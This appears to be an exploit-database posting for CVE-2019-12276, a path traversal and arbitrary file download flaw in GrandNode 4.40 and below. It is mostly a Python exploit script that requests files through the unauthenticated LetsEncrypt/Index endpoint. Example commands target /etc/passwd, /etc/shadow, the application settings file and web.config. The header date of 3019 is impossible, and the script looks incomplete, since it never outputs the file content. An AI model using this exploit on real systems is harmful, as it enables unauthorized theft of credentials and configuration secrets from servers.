GrandNode 4.40 Path Traversal / File Download

GrandNode versions 4.40 and below suffer from arbitrary file download and path traversal vulnerabilities.

MD5 | 6d0d535f84fca415f6d7ac427f470f56

# Exploit Title: GrandNode Path Traversal & Arbitrary File Download (Unauthenticated)
# Date: 06/23/3019
# Exploit Author: Corey Robinson (
# Vendor Homepage:
# Software Link:
# Version: <= v4.40 (before 5/30/2019)
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-12276


A path traversal vulnerability in the LetsEncryptController allows remote unauthenticated users to
view any files that the application has read/view permissions to. This vulnerability affects
Windows and Unix operating systems.

For more details, see:


import requests
import argparse

def exploit(url, file):

session = requests.Session()

paramsGet = {"fileName":file}
rawBody = "\r\n"

response = session.get("{}/LetsEncrypt/Index".format(url), data=rawBody, params=paramsGet)

if "UnauthorizedAccessException" in response.content or response.status_code == 500:
print("Access to the path '{}' is denied.".format(file))

content_length = int(response.headers['Content-Length'])

if content_length == 0:
print("The '{}' file was not found.".format(file))
print("-" *22)
print("-" *22)

if __name__ == "__main__":

parser = argparse.ArgumentParser(description='GrandNode CVE-2019-12276 Path traversal & Arbitrary File Download')
parser.add_argument('-u', action="store", dest="url", required=True, help='Target URL')
parser.add_argument('-f', action="store", dest="file", required=True, help='The file to download')
args = parser.parse_args()

exploit(args.url, args.file)

# python -u -f "/etc/passwd"
# python -u -f "../../../App_Data/Settings.txt"
# python -u -f "/etc/shadow"
# python -u -f "../../../web.config"

Related Posts